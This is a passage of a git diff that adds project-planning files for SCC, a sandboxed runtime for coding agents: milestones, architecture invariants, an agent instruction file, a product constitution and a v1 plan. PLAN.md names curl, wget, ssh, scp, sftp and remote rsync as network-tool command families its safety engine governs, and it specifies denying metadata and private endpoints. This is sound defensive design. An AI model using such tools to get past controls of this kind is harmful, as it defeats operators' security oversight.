directories (like `.codex/`) need to be excluded from git without mutating tracked `.gitignore`, use `.git/info/exclude` — it is local-only, never committed, and has the same syntax as `.gitignore`. Make the write best-effort (non-fatal) since it only affects repo cleanliness, not agent functionality. See `_inject_settings()` in `oci_sandbox_runtime.py`. +- For TOML serialization in a stdlib-only context, a minimal `_serialize_toml()` helper (~15 lines) that handles flat key/value and one-level sections is sufficient for config files. Avoids adding `tomli_w` as a dependency when the config shape is simple (e.g. Codex config.toml). See `codex_agent_runner.py`. +- When a milestone's final slice is initially planned as docs-only but the preceding slices leave architecture decisions unimplemented, expand the final slice to reconcile decisions against code before milestone closure. M007/S05 grew from 1 task to 12 because D033–D042 were recorded as accepted decisions but not yet implemented. Recording a decision is not the same as implementing it. +- Decision-reconciliation guardrail tests (verifying accepted decisions are implemented in code, not just documented) are high-value and cheap to write. 32 tests in test_docs_truthfulness.py mechanically prevent regression of M007 deliverables — they verify ProviderRuntimeSpec fields, fail-closed behavior, auth_check existence, rendered_bytes usage, and product naming consistency. Future milestones should add similar tests when architecture decisions touch public contracts. +- When consolidating N scattered dicts into a single typed registry, the guardrail test that verifies registry keys match the known providers set (`test_registry_keys_match_known_providers`) is as important as the registry itself — it catches drift when someone adds a provider to one place but not the other. +- Provider-parameterized helpers with `provider_id='claude'` default parameters are the cleanest migration path for Claude-named functions. Every existing call site continues working without modification, and new call sites can pass explicit provider_id. The defaults are a migration convenience, not permanent architecture — document this in comments. +- The launch preflight fully consolidates image and auth checks into collect_launch_readiness() + ensure_launch_ready() across all five launch sites. The D048 ordering constraint (auth bootstrap needs StartSessionPlan context) was dissolved in M009/S01 — ensure_launch_ready() only needs the provider adapter and readiness status, both available before plan construction. See D049 which supersedes D048. Readiness is checked early (after provider resolution, before plan construction), which fails faster and avoids unnecessary plan work. +- When building structural guardrail tests that scan source files for banned function calls (e.g. preventing inline `choose_start_provider` after migration to shared preflight), scope the guardrail to the files that are actually migrated. Use a `_MIGRATED_FILES` tuple that explicitly names them — this prevents false positives from files that intentionally still use the old API (because their migration is in a later task or slice) and makes it trivial to extend the guardrail as more files are migrated. +- Regression-guard tests (verifying behavior that is already correct by construction) are cheap to write and high-value for preventing drift. The 106 tests in M008/S03 didn't fix any bugs — they guard correct ordering (set_workspace_last_used_provider after finalize_launch), correct idempotency (setup skips connected providers), and correct error messages (actionable guidance in all typed error classes). Write these proactively when behavior is correct but fragile. +- Auth vocabulary normalization benefits from a formal three-tier model (auth cache present / image available / launch-ready) enforced by tokenize-based guardrail tests, not just documentation. The guardrail catches regressions mechanically — someone adding a new 'connected' string in a future commit hits the guardrail immediately rather than silently reintroducing misleading vocabulary. +- When a function uses deferred imports to satisfy architecture guards (e.g. D046 prevents preflight.py from having top-level imports of adapter-layer helpers), test mocks must patch the *definition site* of the deferred import, not the consumer module. For example, `_ensure_auth()` uses `from ...commands.launch.dependencies import get_agent_provider` inside the function body — tests must patch `scc_cli.commands.launch.dependencies.get_agent_provider`, not `scc_cli.commands.launch.preflight.get_agent_provider`. This is the opposite of the usual rule for re-exported names, because deferred imports bind the name fresh on each call. +- When deprecating a module by making it a thin redirect to the canonical implementation, keep the old module and signature alive for test compatibility rather than deleting it outright. The redirect should build minimal input objects expected by the canonical function and delegate. An optional parameter on the canonical function may be needed for backward-compat when the redirect cannot construct all dependencies the canonical function expects (e.g. _ensure_auth's optional `provider` parameter exists solely because auth_bootstrap.py already has the provider object and cannot look it up via the adapter dispatch table). diff --git a/.gsd/PROJECT.md b/.gsd/PROJECT.md new file mode 100644 index 0000000..4121228 --- /dev/null +++ b/.gsd/PROJECT.md @@ -0,0 +1,114 @@ +# Sandboxed Coding CLI (SCC) + +## What the project is +SCC is a governed runtime for coding agents. It lets organizations run approved agents inside portable sandboxes with explicit policy, team-level configuration, safer defaults, and runtime-enforced controls that are explainable to security reviewers. + +## What the project is not +- not a new general-purpose coding agent +- not a forever-Claude-only wrapper +- not a Docker Desktop-only product +- not a fake security story built on advisory naming +- not a proprietary skills ecosystem + +## Current v1 product target +The v1 target is a clean architecture on top of `scc-sync-1.7.3` that supports Claude Code and Codex through the same provider-neutral core, portable OCI runtimes, enforced web egress, and a shared runtime safety engine. + +## Strategic success condition +A security or platform team can approve SCC because its governance model, runtime enforcement, and diagnostics are understandable and inspectable, while developers can switch providers and team contexts without rebuilding their world. The implementation should also become easier to change over time, not more brittle. + +## Cross-cutting engineering priority +- Maximize maintainability, clean architecture, and clean code while delivering milestones. +- Prefer smaller cohesive modules, typed seams, and composition-root boundaries over growing central orchestrators. +- When a slice touches a large or fragile file, plan the smallest safe extraction that improves testability and future changeability. +- Pair refactors with characterization or contract tests so maintainability work stays measurable. + +## Milestone history + +### M001 — Provider-Neutral Launch Boundary ✅ +Established typed contracts (core/contracts.py), AgentProvider protocol, and provider-neutral seam for launch, runtime, network, safety, and audit planning. + +### M002 — Provider-Neutral Launch Pipeline ✅ +Made AgentProvider and AgentLaunchSpec part of the real launch path. Claude settings are adapter-owned. Codex is a first-class provider. Preflight validation, durable JSONL audit sink, and application-owned support-bundle converged. Launch wizard resume extracted to typed helpers. + +### M003 — Portable Runtime And Enforced Web Egress ✅ +Delivered portable OCI sandbox backend (no Docker Desktop dependency) with topology-enforced web egress via Squid proxy sidecar, provider destination validation, operator diagnostics, and docs truthfulness guardrails. +178 net new tests (3464 total). + +### M004 — Cross-Agent Runtime Safety ✅ +Delivered shared safety policy and verdict engine, runtime wrapper baseline, provider-specific safety adapters, fail-closed policy loader, safety audit reader, doctor safety-policy check, and `scc support safety-audit` CLI command. +289 net new tests (3790 total). + +### M005 — Architecture Quality, Strictness, And Hardening ✅ +Delivered comprehensive architecture quality: module decomposition (15 files split), typed governed-artifact model hierarchy, provider-neutral bundle resolution/rendering pipeline, 100% branch coverage on pipeline modules, D023 portable artifact rendering, and 18 truthfulness guardrail tests. Final: 4486 tests. + +### M006 — Provider Selection UX and End-to-End Codex Launch ✅ +SCC became a genuine multi-provider runtime. Users choose Claude or Codex via config or CLI flag (`scc provider show/set`, `scc start --provider codex`), validated against org/team policy. Provider identity flows through container naming, volume naming, session identity, machine-readable outputs (dry-run JSON, support bundle, session list). CodexAgentRunner adapter with Codex-specific image, settings, and argv. Provider-aware branding ("Sandboxed Coding CLI"), doctor image check with exact build commands, and 16 coexistence proofs. 153 new tests, 4643 total, zero regressions. + +### M007 — Provider Neutralization, Operator Truthfulness, and Legacy Claude Cleanup ✅ +Eliminated Claude assumptions from shared/core/operator paths. ProviderRuntimeSpec replaces 5 scattered dicts. Settings serialization is provider-owned (rendered_bytes, not dict). Config layering is provider-native (Claude home-scoped, Codex workspace-scoped). Unknown providers fail closed. Auth readiness is adapter-owned via auth_check() on AgentProvider. Runtime permission normalization. Config freshness guarantee on every fresh launch. Doctor is provider-aware with --provider flag and categorized output. Core constants stripped to product-level only. 32 truthfulness guardrail tests. 166 net new tests, 4820 total. + +### M008 — Cross-Flow Consistency, Reliability, and Maintainability Hardening ✅ +Consolidated five duplicated launch preflight sequences into one shared module. S01: shared preflight module with typed LaunchReadiness model, flow.py and flow_interactive.py migrated, 7 structural guardrail tests. S02: auth vocabulary truthfulness (three-tier distinction), Docker Desktop removed from active paths, provider adapter dispatch consolidated via shared get_agent_provider() helper, 15 new guardrail tests. S03: 106 edge-case and regression-guard tests covering workspace persistence, resume-after-drift, setup idempotency, and error message quality. Auth bootstrap exception wrapping. Legacy Docker Desktop module documentation. 294 net new tests (5114 total), zero regressions. + +### M009 — Preflight Convergence and Auth Bootstrap Unification ✅ +All five launch sites (flow.py, flow_interactive.py, worktree_commands.py, orchestrator_handlers.py, and the start command) now use collect_launch_readiness() + ensure_launch_ready() through the shared preflight module. ensure_launch_ready() actually calls bootstrap_auth() when auth is missing (silent gap closed). auth_bootstrap.py reduced to deprecated redirect. Auth messaging centralized in preflight._ensure_auth(). Setup's _render_provider_status uses _three_tier_status() so both onboarding panel and completion summary show identical four-state readiness vocabulary. D048 superseded by D049. 3 net new tests (5117 total). + +## Next milestone order +1. ~~M001 — Provider-Neutral Launch Boundary~~ ✅ +2. ~~M002 — Provider-Neutral Launch Pipeline~~ ✅ +3. ~~M003 — Portable Runtime And Enforced Web Egress~~ ✅ +4. ~~M004 — Cross-Agent Runtime Safety~~ ✅ +5. ~~M005 — Architecture Quality, Strictness, And Hardening~~ ✅ +6. ~~M006 — Provider Selection UX and End-to-End Codex Launch~~ ✅ +7. ~~M007 — Provider Neutralization, Operator Truthfulness, and Legacy Claude Cleanup~~ ✅ +8. ~~M008 — Cross-Flow Consistency, Reliability, and Maintainability Hardening~~ ✅ +9. ~~M009 — Preflight Convergence and Auth Bootstrap Unification~~ ✅ + +## Requirement status +- **R001: maintainability in touched high-churn areas** — ✅ validated. Advanced through all nine milestones. + +## Current verification baseline +- `uv run ruff check` ✅ +- `uv run mypy src/scc_cli` ✅ (303 files, 0 issues) +- `uv run pytest -q` ✅ (5117 passed, 23 skipped, 2 xfailed) +- Zero files in src/scc_cli/ exceed 1100 lines +- One file in 800–1100 zone justified (compute_effective_config.py at 852, 93% coverage) + +## Known deferred items +- Wizard cast cleanup (23 casts in wizard.py/flow_interactive.py) — deferred per D018 +- Legacy module coverage (docker_sandbox_runtime 30%, overall 74%) — deprioritized per D017/D021 user overrides +- Portable MCP stdio transport support — requires additional source metadata +- Live bundle registry integration — renderers write metadata references only +- Dashboard provider switching TUI feature (dashboard 'a' key) +- Container labels (scc.provider=) for external tooling discovery +- Image build/push pipeline for scc-agent-codex +- Podman support on the same SandboxRuntime contracts +- `scc auth login/status/logout` commands — model supports them via auth_check() +- Fine-grained volume splitting (auth-only vs ephemeral) for enterprise data-retention (D036) +- start_claude parameter rename to start_agent in worktree_commands.py (deferred from M008/S01) +- WorkContext.provider_id threading through _record_session_and_context (deferred from M008/S01) +- Delete auth_bootstrap.py entirely after updating test consumers to use preflight directly + +## Key architecture invariants +- `bootstrap.py` is the sole composition root for adapter symbols consumed outside `scc_cli.adapters`. +- `AgentLaunchSpec.env` stays empty for file-based providers; provider config travels via `artifact_paths`. +- The canonical provider-adapter characterization shape is: capability metadata, clean-spec, settings-artifact, and env-is-clean. +- Adding a provider to `DefaultAdapters` still requires the same four touch points: adapter file, bootstrap wiring, fake adapters factory, and inline test constructions. +- Provider-core destination validation belongs before launch, not as a runtime surprise. +- RuntimeProbe protocol is the canonical detection surface for runtime capabilities; no consumer outside the adapter layer should call docker.check_docker_available() directly. +- Bootstrap probes runtime at construction time and selects OciSandboxRuntime or DockerSandboxRuntime based on preferred_backend. +- OciSandboxRuntime is imported only in bootstrap.py; application layer uses SandboxRuntime protocol. +- Enforced web-egress uses internal Docker network + dual-homed Squid proxy sidecar as the hard enforcement boundary (D014). +- Safety engine is provider-neutral: DefaultSafetyEngine in core orchestrates shell tokenizer + git rules + network tool rules. Fail-closed semantics. +- SafetyPolicy loader is fail-closed: any parse failure → default block policy. Uses raw org config (not NormalizedOrgConfig). +- Provider safety adapters are pure UX/audit wrappers with zero verdict logic — the engine is the single source of safety truth. +- Import boundary guard (test_import_boundaries.py) mechanically enforces layer separation via AST scanning. +- **Launch preflight is fully unified via commands/launch/preflight.py (D046, D049):** resolve_launch_provider() → collect_launch_readiness() → ensure_launch_ready() is the canonical three-function sequence used by all five launch sites. ensure_launch_ready() calls bootstrap_auth() when auth is missing. Auth messaging lives in _ensure_auth() only. +- Renderers return fragment dicts for caller-owned merge — they do not write shared config files (settings.local.json, .mcp.json) directly. +- **ProviderRuntimeSpec** (frozen dataclass in `core/contracts.py`) is the single source of truth for provider runtime details. **PROVIDER_REGISTRY** in `core/provider_registry.py` maps provider_id → spec. +- Unknown, forbidden, or unavailable providers fail closed in active launch logic — never silently fall back to Claude. +- **AgentRunner owns settings serialization format**: `build_settings()` produces `rendered_bytes: bytes` + `path` + `suffix`, not dict. +- **Product name is 'SCC — Sandboxed Coding CLI'** consistently across README, pyproject.toml, CLI branding, D045, and all user-facing surfaces. +- **Auth vocabulary is three-tier truthful**: 'auth cache present' (file exists), 'image available' (container image present), 'launch-ready' (both). No surface uses 'connected' or standalone 'ready' to describe partial state. All setup surfaces (onboarding panel and completion summary) use the single _three_tier_status() helper. +- **Docker Desktop references** are confined to docker/, adapters/, core/errors.py, and doctor/ layers only. Active user-facing commands/ paths use 'Docker' or 'container runtime'. +- **Provider adapter dispatch** uses a shared `get_agent_provider(adapters, provider_id)` helper in dependencies.py — no hardcoded per-site dispatch dicts. +- **40+ guardrail tests** across test_docs_truthfulness.py, test_auth_vocabulary_guardrail.py, test_lifecycle_inventory_consistency.py, and test_launch_preflight_guardrail.py mechanically prevent regression. +- **Auth bootstrap exception wrapping** in ensure_launch_ready/_ensure_auth: raw exceptions from bootstrap_auth() become ProviderNotReadyError with actionable guidance; already-typed ProviderNotReadyError passes through unchanged. diff --git a/.gsd/REQUIREMENTS.md b/.gsd/REQUIREMENTS.md new file mode 100644 index 0000000..107b8fc --- /dev/null +++ b/.gsd/REQUIREMENTS.md @@ -0,0 +1,29 @@ +# Requirements + +This file is the explicit capability and coverage contract for the project. + +## Validated + +### R001 — SCC changes must improve maintainability by keeping touched areas cohesive, testable, and easier to change, especially when work crosses oversized or high-churn files. +- Class: non-functional +- Status: validated +- Description: SCC changes must improve maintainability by keeping touched areas cohesive, testable, and easier to change, especially when work crosses oversized or high-churn files. +- Why it matters: Maintainability directly drives testability, consistency, and the long-term cost and safety of future provider/runtime changes. +- Source: user-feedback +- Primary owning slice: architecture +- Supporting slices: M002/S03, M002/S05 +- Validation: Proof from M005: Zero files >1100 lines (from 3 at 1665/1493/1336), 15 MANDATORY-SPLIT files decomposed, 3 boundary violations repaired, 31 import boundary tests pass, typed governed-artifact model hierarchy adopted, provider-neutral bundle pipeline with 100% branch coverage (resolver + both renderers), D023 portable artifact rendering implemented, file/function size guardrails pass without xfail, 18 truthfulness tests, 4486 total tests passing. Exit gate: `uv run ruff check` (0 errors), `uv run mypy src/scc_cli` (289 files, 0 issues), `uv run pytest --rootdir "$PWD" -q` (4486 passed, 23 skipped, 2 xfailed). +- Notes: Validated by M002/S05, substantially strengthened by M005. M005 delivered: module decomposition (S02), typed config models (S03), governed-artifact pipeline (S04), 100% pipeline coverage (S05), diagnostics/truthfulness/guardrails (S06), D023 portable artifact rendering (S07). Wizard cast cleanup deferred (D018). Legacy module coverage targets deferred per D017/D021 user overrides directing work toward team-pack architecture. + +## Traceability + +| ID | Class | Status | Primary owner | Supporting | Proof | +|---|---|---|---|---|---| +| R001 | non-functional | validated | architecture | M002/S03, M002/S05 | Proof from M005: Zero files >1100 lines (from 3 at 1665/1493/1336), 15 MANDATORY-SPLIT files decomposed, 3 boundary violations repaired, 31 import boundary tests pass, typed governed-artifact model hierarchy adopted, provider-neutral bundle pipeline with 100% branch coverage (resolver + both renderers), D023 portable artifact rendering implemented, file/function size guardrails pass without xfail, 18 truthfulness tests, 4486 total tests passing. Exit gate: `uv run ruff check` (0 errors), `uv run mypy src/scc_cli` (289 files, 0 issues), `uv run pytest --rootdir "$PWD" -q` (4486 passed, 23 skipped, 2 xfailed). | + +## Coverage Summary + +- Active requirements: 0 +- Mapped to slices: 0 +- Validated: 1 (R001) +- Unmapped active requirements: 0 diff --git a/.gsd/RUNTIME.md b/.gsd/RUNTIME.md new file mode 100644 index 0000000..c98e29e --- /dev/null +++ b/.gsd/RUNTIME.md @@ -0,0 +1,30 @@ +# RUNTIME.md + +## Canonical implementation root +- `scc-sync-1.7.3` is the only writable repo for this work. +- The original dirty `scc` tree is archival and rollback evidence only. + +## Runtime assumptions for v1 +- Plain OCI backend first. +- Docker Engine / OrbStack / Colima-style Docker CLIs are first runtime targets. +- Podman follows on the same contracts after the first Claude/Codex vertical slice is stable. +- Windows support is WSL-first if needed. + +## Verification commands +- `uv run ruff check` +- `uv run mypy src/scc_cli` +- `uv run pytest` + +## Expected runtime deliverables +- `scc-base` +- `scc-agent-claude` +- `scc-agent-codex` +- `scc-egress-proxy` + +## Enforced egress topology +- agent container on internal-only network +- egress proxy as the only component with internal + external attachment +- no host networking +- deny IP literals by default +- deny loopback, private, link-local, and metadata endpoints by default +- proxy ACL evaluates requested host and resolved IP/CIDR diff --git a/.gsd/milestones/M001-CONTEXT.md b/.gsd/milestones/M001-CONTEXT.md new file mode 100644 index 0000000..06d13b7 --- /dev/null +++ b/.gsd/milestones/M001-CONTEXT.md @@ -0,0 +1,25 @@ +# M001-CONTEXT.md + +# Locked decisions for M001 + +## Non-negotiables +- No long-term backward compatibility in core after the one-time migration. +- No Docker Desktop dependency in the architecture. +- No provider-specific logic in core contracts. +- No fake use of overclaimed enforcement language. +- No widening of effective egress outside org policy and delegated team policy. + +## Primary objective +Create the cleanest possible foundation for later runtime and provider work. Do not rush into Podman, Pi, OpenCode, or enterprise dashboards before the baseline and typed architecture are sound. + +## Canonical references +- `CONSTITUTION.md` +- `PLAN.md` +- `.gsd/REQUIREMENTS.md` +- `specs/01-repo-baseline-and-migration.md` +- `specs/02-control-plane-and-types.md` +- `specs/03-provider-boundary.md` +- `specs/07-verification-and-quality-gates.md` + +## Notes +This milestone is intentionally quality-first. It should reduce ambiguity, provider leakage, and orchestration risk before any major feature expansion. diff --git a/.gsd/milestones/M001-RESEARCH.md b/.gsd/milestones/M001-RESEARCH.md new file mode 100644 index 0000000..e8f35e6 --- /dev/null +++ b/.gsd/milestones/M001-RESEARCH.md @@ -0,0 +1,17 @@ +# M001-RESEARCH.md + +# Baseline findings to preserve during refactor + +## Codebase reality from prior review +- Provider abstraction is still too Claude-shaped. +- Error and exit-code contracts need alignment. +- Launch and flow orchestration remain larger than they should be. +- Application/config boundaries still rely too heavily on raw dictionaries. +- Runtime detection is still name-based instead of capability-based. +- Complexity guardrails exist but are not yet enforced strongly enough. + +## Why Milestone 0 / M001 must come first +If the codebase moves directly into multi-runtime and multi-provider work without a green synced baseline and typed contracts, the product will accumulate more provider leakage and more misleading security surfaces. + +## Research conclusion +The best first step is not new runtime code. It is repo truth, vocabulary cleanup, typed core seams, and characterization coverage. diff --git a/.gsd/milestones/M001-ROADMAP.md b/.gsd/milestones/M001-ROADMAP.md new file mode 100644 index 0000000..a0dcbf4 --- /dev/null +++ b/.gsd/milestones/M001-ROADMAP.md @@ -0,0 +1,28 @@ +# M001-ROADMAP.md + +# Milestone M001 — Baseline Freeze And Typed Foundation + +## Outcome +The project has a single authoritative repo root, a green migrated baseline, typed control-plane direction, and the first characterization/contract tests needed for safe refactoring. + +## Slices +- [ ] Freeze the archived dirty `scc` tree and make `scc-sync-1.7.3` the only writable root +- [ ] Normalize local docs, configs, tests, and terminology to the new truthful network vocabulary +- [ ] Re-run the full verification gate on the synced repo and capture the baseline +- [ ] Add characterization tests around current Claude launch, resume, config inheritance, and safety-net behavior +- [ ] Define typed core contracts: `AgentProvider`, `AgentLaunchSpec`, `RuntimeInfo`, `NetworkPolicyPlan`, `SafetyPolicy`, `SafetyVerdict`, and `AuditEvent` +- [ ] Align `SCCError`, exit-code mapping, and human/JSON output contracts +- [ ] Record accepted decisions and update specs so follow-on work does not invent hidden compatibility or provider leaks + +## Dependencies +- none + +## Risk level +High + +## Done when +- `scc-sync-1.7.3` is the only implementation root in active use +- no stale compatibility aliases remain in planned core surfaces +- the baseline is green +- characterization coverage exists for the most fragile current behavior +- the typed control-plane contracts are written down and accepted diff --git a/AGENTS.md b/AGENTS.md new file mode 100644 index 0000000..a4a57ed --- /dev/null +++ b/AGENTS.md @@ -0,0 +1,35 @@ +# AGENTS.md + +## Read this first +Before planning or changing code, read these files in this order: + +1. `CONSTITUTION.md` +2. `PLAN.md` +3. `.gsd/PROJECT.md` +4. `.gsd/REQUIREMENTS.md` +5. `.gsd/DECISIONS.md` +6. `.gsd/KNOWLEDGE.md` +7. `.gsd/RUNTIME.md` +8. `.gsd/milestones/M001-ROADMAP.md` +9. `.gsd/milestones/M001-CONTEXT.md` +10. `.gsd/milestones/M001-RESEARCH.md` +11. `specs/` + +## Project rules +- Treat `scc-sync-1.7.3` as the only implementation root. +- Do not work in the archived dirty `scc` tree. +- Do not preserve old network mode names in core after the one-time migration. +- Do not add backward-compatibility aliases in core unless a new written decision explicitly overrides that rule. +- Do not build SCC as a new coding agent. +- Do not make Docker Desktop a required dependency. +- Do not let provider-specific details leak into core contracts. +- Do not rely on provider-native hooks, rules, or plugins as the only enforcement plane. +- Treat open Agent Skills as the only intended cross-provider portability surface. + +## Execution guidance +- M001 is the only active milestone until it is complete. +- Prefer small, typed, contract-preserving refactors over broad rewrites. +- Add characterization tests before splitting monoliths. +- Keep provider-core destination validation in launch planning, not as a runtime surprise. +- Keep GitHub/npm/PyPI optional; they are never implicitly enabled by choosing a provider. +- When uncertain, update `.gsd/DECISIONS.md` instead of silently inventing policy. diff --git a/CONSTITUTION.md b/CONSTITUTION.md new file mode 100644 index 0000000..8686217 --- /dev/null +++ b/CONSTITUTION.md @@ -0,0 +1,45 @@ +# SCC Product Constitution + +These are the non-negotiable rules for evolving SCC. + +## 1. SCC is a governed runtime, not a new coding agent +SCC competes by governing, isolating, configuring, and operating existing coding agents safely. It does not compete by inventing another general-purpose agent. + +## 2. The governance model is the moat +Org → team → project inheritance, delegation, workspace pinning, sessions, and auditability are product assets, not incidental implementation details. + +## 3. No hard Docker Desktop dependency +Docker Desktop may be supported, but SCC must work through portable OCI runtimes and should remain open to Podman and WSL-first workflows. + +## 4. Security language must match actual enforcement +Do not call a mode "isolated" unless the runtime actually enforces it. Advisory behavior must be described as advisory. + +## 5. Least privilege by default +Provider-core access may be automatic for the selected provider, but all broader egress and integration surfaces must be allowlist-driven. + +## 6. Provider-specific behavior belongs in adapters +Core code must not depend on Claude-specific or Codex-specific paths, config layouts, hook semantics, or plugin details. + +## 7. Typed contracts over loose dictionaries +Raw dictionaries are allowed only at parsing and serialization boundaries. Internal control-plane and runtime planning must use typed models. + +## 8. Open Agent Skills, not proprietary SCC skills +Skills are the shared portability surface. SCC governs provenance, pinning, and installation intent, but does not invent a new SCC-only skill format. + +## 9. Runtime-level safety beats provider luck +Provider-native hooks, rules, and plugins are helpful UX layers, not the hard enforcement plane. + +## 10. WSL-first on Windows is acceptable +Cross-platform support should be pragmatic and testable. WSL-first is acceptable for v1. + +## 11. No architecture rewrite until the synced baseline is green +All major work starts from `scc-sync-1.7.3` with a green baseline and preserved rollback evidence. + +## 12. Open-source local runtime, optional enterprise layer +The local runtime stays inspectable and open. Enterprise value sits above it in identity, policy management, audit export, secrets, and support. + +## 13. Maintainability is a first-class requirement +When touching a large or fragile area, leave it more modular, more typed, better tested, and easier to change. Prefer focused extractions, clear composition roots, and characterization tests over temporary convenience. + +## Amendment rule +Any change to this constitution must be reflected in `.gsd/DECISIONS.md`, the main plan, and the affected specs in the same change. diff --git a/PLAN.md b/PLAN.md new file mode 100644 index 0000000..1659ec6 --- /dev/null +++ b/PLAN.md @@ -0,0 +1,54 @@ +# SCC v1 Clean Architecture Plan on `scc-sync-1.7.3` + +## Summary +- Use `scc-sync-1.7.3` as the only implementation root. Keep the original dirty `scc` tree untouched as archive and rollback evidence. +- Optimize for a clean break, not backward compatibility. Migrate existing local configs, fixtures, docs, and tests once; carry no legacy compatibility aliases in core after that migration. +- Scope v1 to Claude Code and Codex only. SCC remains a governed runtime for coding agents, not a new agent, and it must not depend on Docker Desktop. +- Lock these product rules now: only org and delegated team policy may widen effective egress; project and user scopes may only narrow; the first cross-agent safety layer governs destructive git plus explicit network tools; enforced egress in v1 is HTTP/HTTPS only. +- Treat maintainability as a first-class outcome: each milestone should leave touched areas smaller, better bounded, easier to test, and easier to change than before. +- Success means Claude and Codex both launch from the same provider-neutral core on plain OCI runtimes, provider-core destinations are validated before launch, GitHub/npm/PyPI are optional named allowlist sets, open Agent Skills are the only intended cross-provider workflow portability layer, and hard enforcement lives in the runtime rather than in provider-specific hooks or plugin glue. + +## Core Architecture And Interfaces +- Keep the system split into three layers only: control plane, runtime backend, and provider adapters. Control plane computes typed policy and launch plans, runtime backends materialize isolation and network controls, and provider adapters own provider-specific config, auth surfaces, skills, plugins, and UX integrations. +- Replace the current shallow runner boundary with `AgentProvider.prepare_launch(...) -> AgentLaunchSpec`. `AgentLaunchSpec` must contain provider launch argv/env/workdir, provider artifact locations, required provider-core destination set, and any provider-owned UX add-ons. +- Introduce these typed core models and remove raw dict-driven policy flow from application code: `RuntimeInfo`, `NetworkPolicyPlan`, `DestinationSet`, `EgressRule`, `SafetyPolicy`, `SafetyVerdict`, `AuditEvent`, and `ProviderCapabilityProfile`. +- Make auth adapter-owned, not core-owned. Claude and Codex adapters resolve their own credential modes and mounted auth artifacts; SCC core only reasons about provider capability and required files, never token formats. +- Rename network modes to truthful names and use them everywhere after the one-time migration: `open`, `web-egress-enforced`, and `locked-down-web`. Remove the old `unrestricted`, `corp-proxy-only`, and `isolated` vocabulary from core, docs, and tests. +- Define egress policy shape around typed normalized models: org owns the baseline mode, blocked CIDRs/hosts, named destination sets, and delegation rules; teams may widen only within org-delegated bounds; projects and users may only narrow the effective set or emit request metadata. +- Standardize on open Agent Skills where possible. Skills are the only intended cross-provider instruction and workflow portability layer. +- Treat plugins, hooks, rules, marketplaces, and native config surfaces as provider-native integrations. They are adapter-owned and must never become core assumptions or cross-provider contracts. +- Introduce a provider-neutral governed artifact model in core for approved skills, approved native integrations, provenance, pinning, installation intent, and bundle composition. Teams should enable approved bundles once, and adapters should materialize the same effective plan into native provider formats such as Claude skill assets, Codex `.codex-plugin/plugin.json`, local marketplace entries, hook wiring, or rules configuration. Parity means one approved bundle plan yields the closest truthful native projection on each provider, not that Claude and Codex share one physical plugin file format. +- Treat provider-native instruction layers as adapter-owned too. The same approved SCC bundle may render to `AGENTS.md`, `CLAUDE.md`, Codex rules/hooks, or Claude hook/plugin config, but those files are native outputs rather than canonical policy inputs. +- Split provider-owned artifacts cleanly. Claude owns `.claude` config and hook wiring. Codex owns `.codex` config plus any SCC-managed local Codex plugin bundle using the official `.codex-plugin/plugin.json` and repo marketplace model. + +## Maintainability Doctrine +- Maintainability is not cleanup work deferred to the end; it is part of the acceptance criteria for every milestone and slice. +- When touching oversized or high-churn files, prefer behavior-preserving extraction into smaller typed modules with explicit names and focused responsibilities. +- Add characterization or contract tests before or alongside extractions so refactors reduce risk instead of relocating it. +- Keep composition roots explicit. New adapter wiring, provider selection, and runtime hookup should stay easy to inspect rather than being hidden behind clever indirection. +- Prefer simple, testable control flow over temporary convenience. A change that works but makes the next change harder is incomplete. + +## Implementation Milestones +1. **Milestone 0 — Baseline Freeze And Migration Root**. Declare `scc-sync-1.7.3` the only writable repo, normalize Beads there only, migrate current local configs/docs/tests to the new network vocabulary, remove stale compatibility assumptions, and require a fully green baseline before architecture work continues. +2. **Milestone 1 — Typed Control Plane Foundation**. Finish the typed config migration, replace remaining `dict[str, Any]` policy/config flow with normalized models, align `SCCError` and exit-code mapping, and add a single typed audit event pipeline that network and safety work will reuse. +3. **Milestone 2 — Provider-Neutral Launch Boundary**. Replace the current runner/launch flow with `AgentProvider`, `AgentLaunchSpec`, and provider-owned artifact rendering. Claude is migrated first on the new boundary, Codex is added second on the same boundary with no Claude-specific fallbacks in core. Provider-core destination bundles are implicit from provider selection and must be validated before runtime startup. Shared dev sets such as `github-core`, `npm-public`, and `pypi-public` remain explicit org/team policy choices. Open Agent Skills are governed in core; native plugin and hook materialization stays inside adapters. +4. **Milestone 3 — Portable Runtime And Enforced Web Egress**. Replace name-based runtime detection with capability-based `RuntimeInfo`. Build SCC-owned images `scc-base`, `scc-agent-claude`, `scc-agent-codex`, and `scc-egress-proxy`. Ship a plain OCI backend first that works with Docker Engine, OrbStack, and Colima-style Docker CLIs, then add Podman on the same contracts. In enforced modes, the agent container sits only on an internal network, the proxy is the only component with both internal and external attachment, host networking is forbidden, IP literals are denied, loopback/private/link-local/metadata endpoints are denied by default, and proxy ACLs must check both requested host and resolved IP/CIDR. +5. **Milestone 4 — Cross-Agent Runtime Safety**. Split the current safety-net implementation into a shared `SafetyEngine.evaluate(...) -> SafetyVerdict` plus provider UX adapters. The hard baseline lives in runtime wrappers shipped in `scc-base`; Claude hooks and Codex-native integrations are additive UX and audit surfaces only. V1 command families are destructive git plus explicit network tools: `curl`, `wget`, `ssh`, `scp`, `sftp`, and remote `rsync`. Package managers and cloud/admin tools stay out of the first safety scope. In enforced web-egress modes, network-tool wrappers are defense-in-depth and better UX; topology and proxy policy remain the hard control. +6. **Milestone 5 — Decomposition, Guardrails, And Hardening**. After characterization tests exist, split the large launch and flow orchestrators, re-enable file/function size guardrails by removing the current `xfail` posture, surface runtime/provider/network/safety status in diagnostics, and update docs so the security claims match the implemented behavior exactly. If a slice already touches an oversized or high-churn file before Milestone 5, do the smallest maintainability extraction needed in that slice instead of deferring obvious cleanup. + +## Test Plan +- Start with characterization tests for current Claude launch behavior, current safety-net git protections, and current config inheritance so the refactor preserves intended behavior where it still matters. +- Add contract tests for `AgentProvider`, `AgentLaunchSpec`, `RuntimeInfo`, and `NetworkPolicyPlan` so Claude and Codex share the same core guarantees and runtime backends can be swapped without changing application logic. +- Add policy merge tests that prove org/team widening and project/user narrowing work exactly one way, including blocked attempts that emit structured audit events and suggested request artifacts. +- Add integration tests for the main operator flows: Claude with only `anthropic-core`, Claude with `github-core` and `npm-public`, Codex with only `openai-core`, blocked access to private CIDRs and metadata endpoints, and clear pre-launch failure when a selected provider’s required core destinations are not permitted. +- Add tests for governed artifact handling: approved open skills flow through both providers, while provider-native plugins/hooks/rules are rendered only by the relevant adapter and never leak into core contracts. +- Add safety tests that cover destructive git, explicit network tools, fail-closed behavior when safety policy cannot load, and the shared verdict engine reached through both Claude and Codex integration paths. +- Keep the exit gate fixed for every milestone in `scc-sync-1.7.3`: `uv run ruff 